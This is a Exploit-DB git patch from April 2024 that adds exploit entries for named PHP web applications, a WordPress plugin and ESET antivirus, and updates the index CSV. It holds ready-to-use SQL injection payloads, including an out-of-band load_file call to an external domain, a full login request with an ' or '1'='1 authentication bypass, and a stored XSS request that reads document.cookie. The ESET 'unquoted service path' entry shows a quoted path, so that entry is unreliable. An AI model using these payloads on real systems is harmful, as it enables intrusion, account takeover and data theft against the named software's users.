From a06b0db78ddd1a004881470f08a3081689772628 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 4 Apr 2024 00:16:33 +0000 Subject: [PATCH] DB: 2024-04-04 6 changes to exploits/shellcodes/ghdb Computer Laboratory Management System v1.0 - Multiple-SQLi Petrol Pump Management Software v1.0 - Remote Code Execution (RCE) Quick CMS v6.7 en 2023 - 'password' SQLi Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS) ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path --- exploits/php/webapps/51943.txt | 1 + exploits/php/webapps/51965.txt | 48 ++++++++++++++++++++++++++++++++ exploits/php/webapps/51966.txt | 28 +++++++++++++++++++ exploits/php/webapps/51967.txt | 39 ++++++++++++++++++++++++++ exploits/windows/local/51964.txt | 32 +++++++++++++++++++++ files_exploits.csv | 6 +++- 6 files changed, 153 insertions(+), 1 deletion(-) create mode 100644 exploits/php/webapps/51965.txt create mode 100644 exploits/php/webapps/51966.txt create mode 100644 exploits/php/webapps/51967.txt create mode 100644 exploits/windows/local/51964.txt diff --git a/exploits/php/webapps/51943.txt b/exploits/php/webapps/51943.txt index c0a3435a2..76489378c 100644 --- a/exploits/php/webapps/51943.txt +++ b/exploits/php/webapps/51943.txt @@ -5,6 +5,7 @@ # Software Link:https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html # Version: v1.0 # Tested on: Windows 10 +# CVE: CVE-2024-29410 # Description: File Upload vulnerability in Petrol Pump Management Software v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the logo Photos parameter in the web_crud.php component. # POC: 1. Here we go to : http://127.0.0.1/fuelflow/index.php diff --git a/exploits/php/webapps/51965.txt b/exploits/php/webapps/51965.txt new file mode 100644 index 000000000..d2867eb40 --- /dev/null +++ b/exploits/php/webapps/51965.txt @@ -0,0 +1,48 @@ +# Title: Computer Laboratory Management System v1.0 - Multiple-SQLi +# Author: nu11secur1ty +# Date: 03/28/2024 +# Vendor: https://github.com/oretnom23 +# Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400 +# Reference: https://portswigger.net/web-security/sql-injection + +# Description: +The id parameter appears to be vulnerable to SQL injection attacks. +The payload '+(select +load_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+' +was submitted in the id parameter. This payload injects a SQL +sub-query that calls MySQL's load_file function with a UNC file path +that references a URL on an external domain. The application +interacted with that domain, indicating that the injected SQL query +was executed. The attacker can get all information from the system by +using this vulnerability! + +STATUS: HIGH- Vulnerability + +[+]Payload: +```mysql +--- +Parameter: id (GET) + Type: boolean-based blind + Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY +or GROUP BY clause + Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN +(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl + + Type: error-based + Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or +GROUP BY clause (FLOOR) + Payload: page=user/manage_user&id=7''' AND (SELECT 1734 +FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT +(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM +(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU + + Type: UNION query + Title: MySQL UNION query (NULL) - 11 columns + Payload: page=user/manage_user&id=-2854' UNION ALL SELECT +NULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL# +--- \ No newline at end of file diff --git a/exploits/php/webapps/51966.txt b/exploits/php/webapps/51966.txt new file mode 100644 index 000000000..37011fbe6 --- /dev/null +++ b/exploits/php/webapps/51966.txt @@ -0,0 +1,28 @@ +# Exploit Title: Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS) +# Date: 22 March 2024 +# Exploit Author: Erdemstar +# Vendor: https://wordpress.com/ +# Version: 1.3.1 + +# Proof Of Concept: +1. Click Add New Watermark and enter the XSS payload into the Watermark Text. +2. Stored XSS will run on anyone who wants to edit this page. + +# Vulnerable Property: watermark_title +# PoC Video: https://youtu.be/XEe0Sno6e2g?si=mcgO6VbAwymGXcCp +# Request: +POST /wp-admin/post.php HTTP/2 +Host: erdemstar.local +Cookie: wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7C50573cb574c70a41a241cb9f1f1e3ff22f539fc8630599f2503d02a6c1a7e678; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wp-settings-time-4=1711124335; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=Attacker%7C1711297520%7CVlz1u8etD9HWW066CNCiUHaGUmSK3WLtvpSKgHVMtzP%7Cdae14d9d9aa7f0c4df03783bb2bd321a5b3d6a63d8c3e1ae131dda689c595862; wp-settings-time-5=1711124723 +Content-Length: 1460 +Upgrade-Insecure-Requests: 1 +Origin: https://erdemstar.local +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Referer: https://erdemstar.local/wp-admin/post-new.php?post_type=watermark&wp-post-new-reload=true +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Priority: u=0, i + +_wpnonce=99a1d1e63a&_wp_http_referer=%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dwatermark&user_ID=5&action=editpost&originalaction=editpost&post_author=5&post_type=watermark&original_post_status=auto-draft&referredby=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&_wp_original_http_referer=https%3A%2F%2Ferdemstar.local%2Fwp-admin%2Fedit.php%3Fpost_type%3Dwatermark&auto_draft=1&post_ID=35&meta-box-order-nonce=ea875c0c6f&closedpostboxesnonce=d29be25ad8&post_title=&samplepermalinknonce=1e667edd3a&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=03&jj=22&aa=2024&hh=16&mn=25&ss=23&hidden_mm=03&cur_mm=03&hidden_jj=22&cur_jj=22&hidden_aa=2024&cur_aa=2024&hidden_hh=16&cur_hh=16&hidden_mn=25&cur_mn=25&original_publish=Publish&publish=Publish&tax_input%5BCategories%5D%5B%5D=0&post_name=&custom_meta_box_nonce=d1322f94a0&watermark_title=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&img_sizes%5B%5D=thumbnail&img_sizes%5B%5D=medium&img_sizes%5B%5D=large&img_sizes%5B%5D=full&txt_type=ARIAL.TTF&rgb=38%2C1%2C24&txt_size=8&color=%23260118&rotation=&opicity=100&position=top&destance_x=&mesaure_x=px&padding=&mesaure_y=px&background=yes&rgb_bg=255%2C0%2C0&bg_destance_x=&bg_padding=&color_bg=%23ff0000&image=&img_rotation=&img_opicity=100&img_position=top&img_size=4&img_destance_x=&img_mesaure_x=px&img_padding=&img_mesaure_y=px \ No newline at end of file diff --git a/exploits/php/webapps/51967.txt b/exploits/php/webapps/51967.txt new file mode 100644 index 000000000..77dc1f93f --- /dev/null +++ b/exploits/php/webapps/51967.txt @@ -0,0 +1,39 @@ +# Title: Quick CMS v6.7 en 2023 - 'password' SQLi +# Author: nu11secur1ty +# Date: 03/19/2024 +# Vendor: https://opensolution.org/ +# Software: https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip +# Reference: https://portswigger.net/web-security/sql-injection + +# Description: The password parameter is vulnerable for SQLi bypass authentication! + +[+]Payload: +```mysql +POST /admin.php?p=login HTTP/1.1 +Host: localpwnedhost.com +Cookie: PHPSESSID=39eafb1sh5tqbar92054jn1cqg +Content-Length: 92 +Cache-Control: max-age=0 +Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122" +Sec-Ch-Ua-Mobile: ?0 +Sec-Ch-Ua-Platform: "Windows" +Upgrade-Insecure-Requests: 1 +Origin: https://localpwnedhost.com +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: navigate +Sec-Fetch-User: ?1 +Sec-Fetch-Dest: document +Referer: https://localpwnedhost.com/admin.php +Accept-Encoding: gzip, deflate, br +Accept-Language: en-US,en;q=0.9 +Priority: u=0, i +Connection: close + +sEmail=kurec%40guhai.mi.huq&sPass=%27+or+%271%27%3D%271&bAcceptLicense=1&iAcceptLicense=true + +``` \ No newline at end of file diff --git a/exploits/windows/local/51964.txt b/exploits/windows/local/51964.txt new file mode 100644 index 000000000..9ac579f93 --- /dev/null +++ b/exploits/windows/local/51964.txt @@ -0,0 +1,32 @@ +# Exploit Title: ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path +# Exploit Author: Milad Karimi (Ex3ptionaL) +# Exploit Date: 2024-04-01 +# Vendor : https://www.eset.com +# Version : 17.0.16.0 +# Tested on OS: Microsoft Windows 10 pro x64 + +C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" +|findstr /i /v "c:\windows\\" |findstr /i /v """ + +ESET Updater ESETServiceSvc C:\Program Files (x86)\ESET\ESET +Security\ekrn.exe + +C:\>sc qc ekrn +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ekrn + TYPE : 20 WIN32_SHARE_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program Files\ESET\ESET Security\ekrn.exe" + LOAD_ORDER_GROUP : Base + TAG : 0 + DISPLAY_NAME : ESET Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\>systeminfo + +OS Name: Microsoft Windows 10 Pro +OS Version: 10.0.19045 N/A Build 19045 +OS Manufacturer: Microsoft Corporation \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 12be7ed11..3dddf301f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -16242,6 +16242,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 34536,exploits/php/webapps/34536.txt,"CompuCMS - Multiple SQL Injections / Cross-Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",webapps,php,,2010-08-26,2014-09-05,1,,,,,,https://www.securityfocus.com/bid/42773/info 33178,exploits/php/webapps/33178.txt,"Computer Associates SiteMinder - '%00' Cross-Site Scripting Protection Security Bypass",2009-06-08,"Arshan Dabirsiaghi",webapps,php,,2009-06-08,2014-05-04,1,CVE-2009-2704;OSVDB-56970,,,,,https://www.securityfocus.com/bid/36086/info 30746,exploits/php/webapps/30746.txt,"Computer Associates SiteMinder - Web Agent Smpwservices.FCC Cross-Site Scripting",2007-11-07,"Giuseppe Gottardi",webapps,php,,2007-11-07,2014-01-06,1,CVE-2007-5923;OSVDB-40269,,,,,https://www.securityfocus.com/bid/26375/info +51965,exploits/php/webapps/51965.txt,"Computer Laboratory Management System v1.0 - Multiple-SQLi",2024-04-03,nu11secur1ty,webapps,php,,2024-04-03,2024-04-03,0,,,,,, 32598,exploits/php/webapps/32598.txt,"COms - 'dynamic.php' Cross-Site Scripting",2008-11-24,Pouya_Server,webapps,php,,2008-11-24,2014-03-31,1,OSVDB-50170,,,,,https://www.securityfocus.com/bid/32459/info 29907,exploits/php/webapps/29907.txt,"Comus 2.0 - 'Accept.php' Remote File Inclusion",2007-04-25,alijsb,webapps,php,,2007-04-25,2013-11-29,1,CVE-2007-2287;OSVDB-34168,,,,,https://www.securityfocus.com/bid/23661/info 3152,exploits/php/webapps/3152.txt,"ComVironment 4.0 - 'grab_globals.lib.php' Remote File Inclusion",2007-01-18,GoLd_M,webapps,php,,2007-01-17,2016-09-21,1,OSVDB-34621;CVE-2007-0395,,,,http://www.exploit-db.comcomvironment_4.0frc3.tar.gz, @@ -25846,7 +25847,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 41586,exploits/php/webapps/41586.txt,"Pet Listing Script 3.0 - SQL Injection",2017-03-11,"Ihsan Sencan",webapps,php,,2017-03-11,2017-03-11,0,,,,,, 50353,exploits/php/webapps/50353.php,"Pet Shop Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-09-29,Mr.Gedik,webapps,php,,2021-09-29,2021-09-29,0,,,,,, 38391,exploits/php/webapps/38391.txt,"Petite Annonce - Cross-Site Scripting",2013-03-14,Metropolis,webapps,php,,2013-03-14,2015-10-03,1,,,,,,https://www.securityfocus.com/bid/58508/info -51943,exploits/php/webapps/51943.txt,"Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-02,0,,,,,, +51943,exploits/php/webapps/51943.txt,"Petrol Pump Management Software v1.0 - Remote Code Execution (RCE)",2024-04-02,"Sandeep Vishwakarma",webapps,php,,2024-04-02,2024-04-03,0,CVE-2024-29410,,,,, 51032,exploits/php/webapps/51032.py,"pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)",2023-02-20,IHTeam,webapps,php,,2023-02-20,2023-02-20,0,CVE-2022-31814,,,,, 6442,exploits/php/webapps/6442.txt,"pForum 1.30 - 'showprofil.php' SQL Injection",2008-09-12,tmh,webapps,php,,2008-09-11,2016-12-22,1,OSVDB-48109;CVE-2008-4355,,,,, 23901,exploits/php/webapps/23901.txt,"pfSense 2.0.1 - Cross-Site Scripting / Cross-Site Request Forgery / Remote Command Execution",2013-01-05,"Yann CAM",webapps,php,,2013-01-05,2013-04-15,1,OSVDB-88930;OSVDB-88929;OSVDB-88928,,,http://www.exploit-db.com/screenshots/idlt24000/screenshot.png,, @@ -28653,6 +28654,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 31481,exploits/php/webapps/31481.txt,"Quick Classifieds 1.0 - 'search_results.php3?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53025,,,,,https://www.securityfocus.com/bid/28417/info 31514,exploits/php/webapps/31514.txt,"Quick Classifieds 1.0 - 'style/default.scheme.inc?DOCUMENT_ROOT' Remote File Inclusion",2008-03-24,ZoRLu,webapps,php,,2008-03-24,2014-02-07,1,CVE-2008-6543;OSVDB-53058,,,,,https://www.securityfocus.com/bid/28417/info 32387,exploits/php/webapps/32387.txt,"Quick CMS Lite 2.1 - 'admin.php' Cross-Site Scripting",2008-09-16,"John Cobb",webapps,php,,2008-09-16,2014-03-20,1,CVE-2008-4139;OSVDB-48135,,,,,https://www.securityfocus.com/bid/31210/info +51967,exploits/php/webapps/51967.txt,"Quick CMS v6.7 en 2023 - 'password' SQLi",2024-04-03,nu11secur1ty,webapps,php,,2024-04-03,2024-04-03,0,,,,,, 45698,exploits/php/webapps/45698.txt,"Quick Count 2.0 - 'txtInstID' SQL Injection",2018-10-26,"Ihsan Sencan",webapps,php,,2018-10-26,2018-10-26,0,,,,,http://www.exploit-db.comQCLxDwn_200.zip, 10837,exploits/php/webapps/10837.txt,"Quick Poll - 'code.php?id' SQL Injection",2009-12-31,"Hussin X",webapps,php,,2009-12-30,,1,,,,,, 7105,exploits/php/webapps/7105.txt,"Quick Poll Script - 'id' SQL Injection",2008-11-12,"Hussin X",webapps,php,,2008-11-11,2017-01-02,1,OSVDB-47814;CVE-2008-3765,,,,, @@ -32880,6 +32882,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 37902,exploits/php/webapps/37902.php,"WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities",2012-10-01,"Tapco Security",webapps,php,,2012-10-01,2015-08-21,1,,"WordPress Plugin",,,,https://www.securityfocus.com/bid/55749/info 30036,exploits/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting",2007-05-14,"David Kierznowski",webapps,php,,2007-05-14,2017-11-22,1,CVE-2007-2714;OSVDB-37290,"WordPress Plugin",,,,https://www.securityfocus.com/bid/23965/info 37464,exploits/php/webapps/37464.txt,"WordPress Plugin Albo Pretorio Online 3.2 - Multiple Vulnerabilities",2015-07-02,"Alessandro Cingolani",webapps,php,80,2015-07-02,2015-07-02,0,OSVDB-124060;OSVDB-124058;OSVDB-124057;OSVDB-124056;OSVDB-124055;OSVDB-124054;OSVDB-124053,,,,http://www.exploit-db.comalbo-pretorio-on-line.3.2.zip, +51966,exploits/php/webapps/51966.txt,"Wordpress Plugin Alemha Watermarker 1.3.1 - Stored Cross-Site Scripting (XSS)",2024-04-03,Erdemstar,webapps,php,,2024-04-03,2024-04-03,0,,,,,, 36323,exploits/php/webapps/36323.txt,"WordPress Plugin Alert Before Your Post - 'name' Cross-Site Scripting",2011-11-21,Am!r,webapps,php,,2011-11-21,2015-03-11,1,CVE-2011-5107;OSVDB-77475,"WordPress Plugin",,,,https://www.securityfocus.com/bid/50743/info 45056,exploits/php/webapps/45056.txt,"WordPress Plugin All In One Favicon 4.6 - (Authenticated) Cross-Site Scripting",2018-07-19,"Javier Olmedo",webapps,php,80,2018-07-19,2018-07-20,0,CVE-2018-13832,"Cross-Site Scripting (XSS)",,,, 40082,exploits/php/webapps/40082.txt,"WordPress Plugin All in One SEO Pack 2.3.6.1 - Persistent Cross-Site Scripting",2016-07-11,"David Vaartjes",webapps,php,80,2016-07-11,2016-07-11,0,,,,,http://www.exploit-db.comall-in-one-seo-pack.2.3.6.1.zip, @@ -40185,6 +40188,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path",2021-02-09,"Hector Gerbacio",local,windows,,2021-02-09,2021-02-17,0,,,,,, 25448,exploits/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,local,windows,,2013-05-14,2013-05-14,1,CVE-2013-0726;OSVDB-92694,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/51725/ 26708,exploits/windows/local/26708.rb,"ERS Viewer 2013 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-07-09,Metasploit,local,windows,,2013-07-09,2013-07-09,1,CVE-2013-3482;OSVDB-93650,"Metasploit Framework (MSF)",,,,http://secunia.com/advisories/53620/ +51964,exploits/windows/local/51964.txt,"ESET NOD32 Antivirus 17.0.16.0 - Unquoted Service Path",2024-04-03,"Milad karimi",local,windows,,2024-04-03,2024-04-03,0,,,,,, 51351,exploits/windows/local/51351.txt,"ESET Service 16.0.26.0 - 'Service ekrn' Unquoted Service Path",2023-04-08,"Milad karimi",local,windows,,2023-04-08,2023-04-08,0,,,,,, 7516,exploits/windows/local/7516.txt,"ESET Smart Security 3.0.672 - 'epfw.sys' Local Privilege Escalation",2008-12-18,"NT Internals",local,windows,,2008-12-17,,1,CVE-2008-5724;OSVDB-50942,,2008-Epfw_Exp.zip,,, 17880,exploits/windows/local/17880.rb,"eSignal and eSignal Pro 10.6.2425.1208 - File Parsing Buffer Overflow in QUO (Metasploit)",2011-09-20,Metasploit,local,windows,,2011-09-21,2011-09-21,1,CVE-2011-3494;OSVDB-75456,"Metasploit Framework (MSF)",,,,